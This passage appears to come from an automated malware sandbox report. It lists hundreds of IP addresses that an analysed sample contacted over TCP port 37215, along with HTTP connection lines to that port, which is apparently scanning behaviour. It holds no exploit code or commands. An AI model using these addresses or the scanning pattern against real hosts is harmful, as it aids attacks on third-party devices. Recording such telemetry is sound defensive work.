          Source: global trafficTCP traffic: 84.226.138.15 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 157.140.191.23 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 197.97.187.172 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 41.157.97.119 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 45.218.85.122 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 157.247.228.204 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 99.246.133.19 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 41.249.66.231 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 41.153.35.133 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 157.185.177.177 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 157.84.140.28 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 197.11.136.200 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 197.91.71.236 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 157.174.146.189 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 41.142.63.153 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 157.187.195.63 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 41.69.170.85 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 41.22.202.77 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 157.221.137.61 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 25.247.27.1 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 197.95.37.89 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 157.22.232.44 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 150.104.69.229 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 41.147.165.225 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 182.2.121.133 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 157.229.42.61 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 41.128.150.6 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 197.171.105.38 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 150.221.57.180 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 41.83.55.9 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 41.174.25.52 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 41.86.122.164 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 197.96.111.20 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 202.213.139.72 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 157.24.190.129 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 197.1.211.10 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 41.227.38.226 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 41.106.176.227 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 157.238.137.243 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 40.13.193.59 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 38.109.69.49 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 197.232.190.138 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 189.84.251.110 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 41.20.208.211 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 157.25.1.39 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 4.218.1.48 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 157.63.89.28 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 41.179.57.12 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 62.69.134.142 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 157.81.63.36 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 41.12.139.243 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 157.147.162.141 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 157.104.113.227 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 126.155.60.251 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 157.161.26.216 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 197.102.4.194 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 136.72.146.150 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 41.91.63.252 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 41.85.114.65 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 41.114.48.144 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 4.232.157.232 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 197.197.94.119 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 197.33.247.116 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 193.191.250.129 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 197.80.43.242 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 197.19.68.200 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 197.51.91.61 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 122.98.81.65 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 41.139.151.5 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 41.240.224.54 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 157.179.102.70 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 207.190.136.71 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 218.208.234.57 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 41.105.159.159 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 157.194.123.83 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 191.176.230.7 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 107.151.34.167 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 197.235.131.94 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 157.66.7.235 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 111.56.6.70 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 157.219.2.50 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 197.175.88.24 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 41.107.252.18 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 41.90.106.55 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 157.69.30.4 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 120.115.28.185 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 113.14.147.157 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 197.187.77.192 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 157.29.141.235 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 134.149.108.162 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 41.101.153.168 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 197.161.198.127 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 157.39.27.71 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 197.201.212.85 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 41.65.151.45 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 167.126.51.96 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 41.217.239.125 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 41.213.47.74 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 157.23.60.164 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 197.50.51.123 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 134.239.241.18 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 41.176.11.237 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 157.79.109.213 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 145.29.163.48 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 115.100.165.167 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 41.152.77.47 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 197.154.0.39 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 185.74.163.185 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 197.20.142.34 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 79.109.207.191 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 197.108.98.81 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 157.207.244.138 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 157.4.171.221 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 96.16.251.87 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 174.195.9.204 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 157.248.136.195 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 90.94.178.60 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 41.60.75.50 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 87.138.213.255 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 49.88.113.187 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 41.117.195.167 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 197.99.217.221 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 191.252.184.173 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 157.30.91.97 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 78.155.28.203 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 207.124.200.237 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 197.103.39.48 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 41.177.106.35 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 73.248.0.152 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 197.105.228.89 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 197.216.245.45 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 156.140.83.4 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 157.112.7.141 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 217.81.237.133 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 180.93.177.112 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 197.154.56.229 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 51.109.240.163 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 197.29.88.247 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 197.115.60.78 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 157.119.82.180 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 157.125.35.75 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 41.175.184.115 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 197.114.128.36 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 64.141.234.60 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 41.1.165.81 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 197.230.86.246 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 157.51.36.210 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 197.42.140.11 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 157.250.40.168 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 197.123.164.22 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 195.65.4.91 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 157.30.141.192 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 76.38.247.59 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 41.41.21.73 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 41.249.12.126 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 157.226.128.112 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 197.17.50.165 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 109.169.161.130 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 104.28.93.246 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 197.89.199.30 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 197.100.93.108 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 197.45.216.149 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 197.134.201.57 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 157.79.31.249 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 157.180.179.145 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 197.183.131.52 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 197.199.21.55 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 204.143.20.70 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 41.239.227.107 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 197.35.89.234 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 41.128.116.35 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 41.238.14.167 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 41.108.17.4 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 41.179.158.16 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 197.244.203.171 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 157.203.174.221 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 41.236.127.99 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 170.217.222.105 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 41.129.103.228 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 157.195.31.142 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 41.40.92.121 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 94.220.26.126 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 41.1.153.178 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 197.194.199.110 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 197.176.193.198 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 41.231.181.234 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 157.55.241.99 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 197.232.135.30 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 157.61.194.101 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 41.169.112.29 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 165.249.12.171 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 41.4.20.117 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 197.202.6.183 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 41.170.131.15 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 157.54.209.95 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 157.246.161.111 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 62.45.133.211 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 197.226.15.217 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 157.238.170.219 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 197.233.38.85 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 157.217.217.33 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 41.193.208.12 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 157.243.209.220 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 157.118.178.101 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 41.209.144.23 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 207.230.18.128 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 87.168.196.168 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 157.193.49.46 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 72.241.122.7 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 197.191.211.149 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 157.56.134.232 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 197.63.168.187 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 157.96.114.8 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 173.143.147.8 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 105.161.92.122 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 197.65.37.209 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 157.63.239.213 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 41.73.121.22 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 92.133.193.11 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 41.69.250.226 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 157.82.118.165 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 197.121.114.64 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 101.158.98.20 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 113.254.112.33 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 41.39.214.40 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 157.64.168.87 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 41.239.93.205 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 41.75.11.13 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 197.254.87.38 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 138.83.56.96 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 175.27.181.201 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 197.9.83.77 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 122.0.110.216 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 197.134.15.67 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 157.67.62.10 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 195.32.192.64 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 41.59.143.19 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 157.246.226.203 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 197.143.106.233 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 197.186.140.96 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 157.75.210.108 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 41.105.51.23 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 83.218.156.135 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 41.186.114.199 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 89.67.28.110 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 200.204.67.168 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 41.126.6.135 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 197.17.216.160 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 72.132.102.24 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 157.255.194.136 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 41.191.22.76 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 157.212.119.57 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 110.160.1.79 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 197.247.122.1 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 121.184.225.209 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 139.202.38.25 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 197.27.167.157 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 197.208.93.80 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 41.61.78.93 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 157.155.230.58 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 41.188.130.212 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 197.230.67.85 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 91.34.171.68 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 157.140.180.22 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 197.232.114.148 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 197.160.4.88 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 74.31.120.185 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 197.46.196.145 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 216.93.117.227 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 157.221.56.188 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 41.218.127.151 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 41.50.149.98 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 63.43.76.51 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 197.126.148.221 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 157.155.97.158 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 157.47.87.135 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 197.29.250.110 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 41.155.61.99 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 96.59.61.64 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 157.219.223.65 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 41.41.111.225 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 112.32.105.31 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 203.30.50.212 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 197.113.157.53 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 157.67.243.177 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 178.64.112.9 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 157.103.216.227 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 41.252.239.78 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 157.204.41.187 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 41.188.70.112 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 157.38.70.25 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 197.125.59.120 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 41.60.71.214 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 197.30.15.144 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 157.128.54.22 ports 1,2,3,5,7,37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 51164 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 36202 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 47496 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 50322 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 56392 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 54126 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 44662 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 58056 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 39428 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 34812 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 37490 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 40452 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 34260 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 32816 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 43090 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 35122 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 38888 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 49842 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 50886 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 55318 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 38692 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 40494 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 48418 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 33054 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 56050 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 45132 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 36990 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 37890 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 56212 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 54192 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 56486 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 39566 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 57810 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 51458 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 32960 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 33028 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 33094 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 57218 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 56740 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 35286 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 58310 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 39822 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 55990 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 37232 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 39074 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 44464 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 56764 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 58250 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 50150 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 40428 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 52548 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 38602 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 49900 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 38020 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 41690 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 33684 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 34178 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 35458 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 35484 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 34696 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 58182 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 37178 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 38648 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 50798 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 46336 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 48800 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 58800 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 39484 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 48848 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 55258 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 39482 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 33090 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 60380 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 41528 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 37400 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 49018 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 43940 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 54076 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 57264 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 59592 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 51108 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 56044 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 40848 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 41040 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 46530 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 50568 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 58820 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 53202 -> 37215
